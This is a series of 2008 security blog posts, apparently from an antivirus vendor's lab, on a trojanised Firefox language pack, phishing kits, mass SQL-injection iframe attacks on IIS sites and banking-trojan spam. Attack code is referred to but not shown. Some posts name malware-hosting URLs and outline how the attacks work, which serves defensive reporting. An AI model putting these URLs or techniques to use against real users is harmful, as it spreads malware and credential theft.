Posted
by
Xabier Francisco at
08 May 08 06:54
Mozilla has published in its blog some news regarding the incidence with the Vietnamese language pack for Firefox 2.
In February, a Vietnamese language pack for Firefox was published. The problem was that before being uploaded to the corresponding server, it had been already infected, as the internal code of the *.xhtml files had been modified and included the following instruction:
The files which contain that malicious code are detected as W32/Xorer.T.
This instruction resolves to: http://js.k0102.com/01.asp , don’t worry because this URL is currently offline.
The question is: how can anybody be sure that their computer is malware free?
You can check it in http://www.infectedornot.com, and scan your computer with the ActiveScan 2.0 online scanner, a security solution that operates on the basis of 'collective intelligence', which allows many more threats to be detected.
Posted
by
Xabier Francisco at
07 May 08 05:26
Nowadays launching a phishing attack or creating an online service fake website is quite an easy task for anybody. There is no need for advanced technical knowledge or significant financial resources.
Generally we tend to relate phishing only to fake webs of banking entities. However, there are also kits related to other online services such as Gmail, Yahoo, Youtube, Fotolog, Hi5, etc… as we have commented in a previous post.
It is possible to find information or even instructions of how to use these kits and how to carry out the attacks in forums, blogs, online videos, etc. Additionally, sometimes not only you can find the instructions but the tools themselves for free.
Below you can see some examples of the availability of these kits:
The way these kits work is similar whether the attack is launched against a banking entity or any other service. Using a mass mailing tool, a fake message -which passes itself off as the real entity or service-, is sent to a wide list of email addresses. This message contains an obfuscated link of the legitimate URL which will point to a fake website imitating the original one.
If the users are not aware of the fraud and enter their login credentials to that service, that information will be sent via email to the cyber-crook or hosted in a file at the cyber-crook’s disposal.
The phishing attacks are also evolving and not only are they hidden in domains similar to the legitimate ones. I have recently read in the blog of Dancho Danchev a curious phishing attack against myspace. In this case, the fake website is located in a profile of the legitimate domain of myspace, in which the cyber-crook has inserted a fake login website to myspace service in order to obtain the access keys of the unaware users that try to login in order to see the content of the profile.
Posted
by
Luis Corrons at
02 May 08 11:37
Actually it is taking place the 2nd CARO meeting at the Crowne Plaza Hoofddorp in The Netherlans. This year's topic is about Packers, Decryptors and Obfuscators, and indeed some of the presentations are superb. The program is published here. While I'm writing this post, Mike Morgenstern & Andreas Marx, from AV-Test.org are giving a speach about their Runtime Packer Testing Experiences.
In a few minutes we'll have 3 different talks about detection and blacklisting of packers, which is both interesting and controversial.
Posted
by
ocavada at
30 April 08 06:00
We have recently detected another spam message that contains a malicious URL. This is nothing new, but what if you receive an email message coming from a reliable source, such as a security company?
This is what has happened with a spam message that uses our free online analysis tool Activescan as a bait to deceive users.
The following image is the fake message that the user would receive. Note that it contains the logo of our company, but as we can see the analysis tool points to a malicious URL and not Panda’s.
If the link is followed, a file called ScanActive.zip will be downloaded, as can be seen in the image below:
This file is not really our online analysis tool but a Banker Trojan belonging to the Banbra family, concretely Banbra.FRJ, which is designed to steal confidential information related to certain Brazilian banking entities.
Posted
by
Xabier Francisco at
28 April 08 11:58
The first thing we observed when we analysed the attack which included an iframe pointing to a malicious website in hundreds of thousands of web pages was that all the compromised websites were in servers with IIS and MSSQL. Initially, the most likely hypothesis was that some known exploit was being used to attack some of these platforms.
However, after a deeper analysis, we observed that it was not a vulnerability in IIS or MSSQL Server, but some badly programmed asp code, which compromised the websites hosted in these IIS servers with MSSQL.
The asp code we show below (“orderitem.asp”), interacts with a MSSQL database, which allows the use of SQL injection techniques in order to insert data in the database, in such a way that it was possible to include the iframe in the hosted websites.
For security reasons, the whole asp code has not been included.
Posted
by
Xabier Francisco at
25 April 08 02:19
This graph is an example of the infection process that takes place from the moment when a user accesses a legitimate website that has been modified until the possible infection is effective.
Thanks to Oscar and Olaiz for their collaboration.
Posted
by
Xabier Francisco at
24 April 08 07:27
Nowadays it is usually taken for granted that we can only get infected if we visit malicious websites or run files coming from untrustworthy sources. However, lately we have detected several cases in which by exploiting vulnerabilities in the web servers malicious code can be introduced in the websites hosted in them.
Therefore, we might come across trustworthy websites which contain malicious code introduced by a cyber-crook.
The following is one piece of code we found introduced in certain websites:
It must be noted that up to now the number of websites that contain this piece of code are approximately 282.000.
This malicious script of the web, known as iframe, contains instructions that will be interpreted by the browser, redirecting it to a web or to the downloading of a malicious file.
The instructions it contains are the following:
In this particular case, the user will be redirected transparently to a URL which will check if our system is protected against certain vulnerabilities. If any vulnerability is found, our computer will get infected with malware.
These are some of the vulnerabilities exploited to install malware in our computer:
MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution
MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution
MS07-018 Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution
MS07-033 Cumulative Security Update for Internet Explorer
MS07-055 Vulnerability in kodak Image Viewer Could Allow Remote Code Execution
This implies that in spite of browsing through safe websites, we can come across legitimate web pages whose code has been previously modified in order to infect our computer.
That’s why we recommend you to check the updates of your operating system.
Posted
by
ocavada at
16 April 08 01:06
Several years ago, the main aim of cyber-crooks was to achieve notoriety with their creations, that is, to be famous. In order to do so, they wanted to attract as much attention as possible and causing massive epidemics was their springboard to fame
Their motivation has changed and now is purely economic. The best way to obtain money is to carry out malicious actions as stealthily as possible. It has become a usual technique to hide malware creations using rootkits, such as the famous Stormworm family.
This trend has made malware creation become a very lucrative business.
However, we still come across with samples as eye-catching as W32/MSNworm.EI.worm, which spreads via the MSN Messenger and displays a funny picture of a little pig sending us a kiss while it is infecting our computer:
Posted
by
Ismael Briones at
09 April 08 12:34
Five critical and three important updates have been released (from MS08-018 to MS08-025). It's time to start updating your system if you haven't done it yet.
Critical updates affect these components: Microsoft Project, GDI, VBScript and JScript scripting engines, updated ActiveX Kill Bits and Internet Explorer. On the other hand, DNS Client, Windows Kernel and MIcrosoft Visio are patched with important updates.
Most of them allow remote code execution, so don't forget to update your system asap.
You can find more information about the security bulletins by clicking the following link: MS08-April
Posted
by
Xabier Francisco at
04 April 08 02:11
Big Brother Brasil again. I am not very fond of this type of programs, but spammers have made me pay attention to them. J
Then, we wondered who would be the following participant selected to distribute malware. We thought they would make the selection among the finalists. However, this time the candidate has been a female participant called “Juliana”, who had already been evicted from the house.
These spam messages, which contain malicious websites, have subjects such as “Juliana do BBB do modo como você queria ver.” or “Chegou um Vivo FotoTorpedo para voce !!!”, and will invite us to view a video or photos of this participant. However, when the link of the message is followed (http://www.gallimard-jeunesse.fr/[Removed]/visualizer/Visualizar.php), we will be redirected to a web from which the malware detected as Trj/Banbra.FPJ will be downloaded:
This Trojan is designed to obtain the affected users’ access keys to several banking entities.
P.S: If you feel curious to know who the winner of Big Brother Brasil 2008 was, it was Rafhina.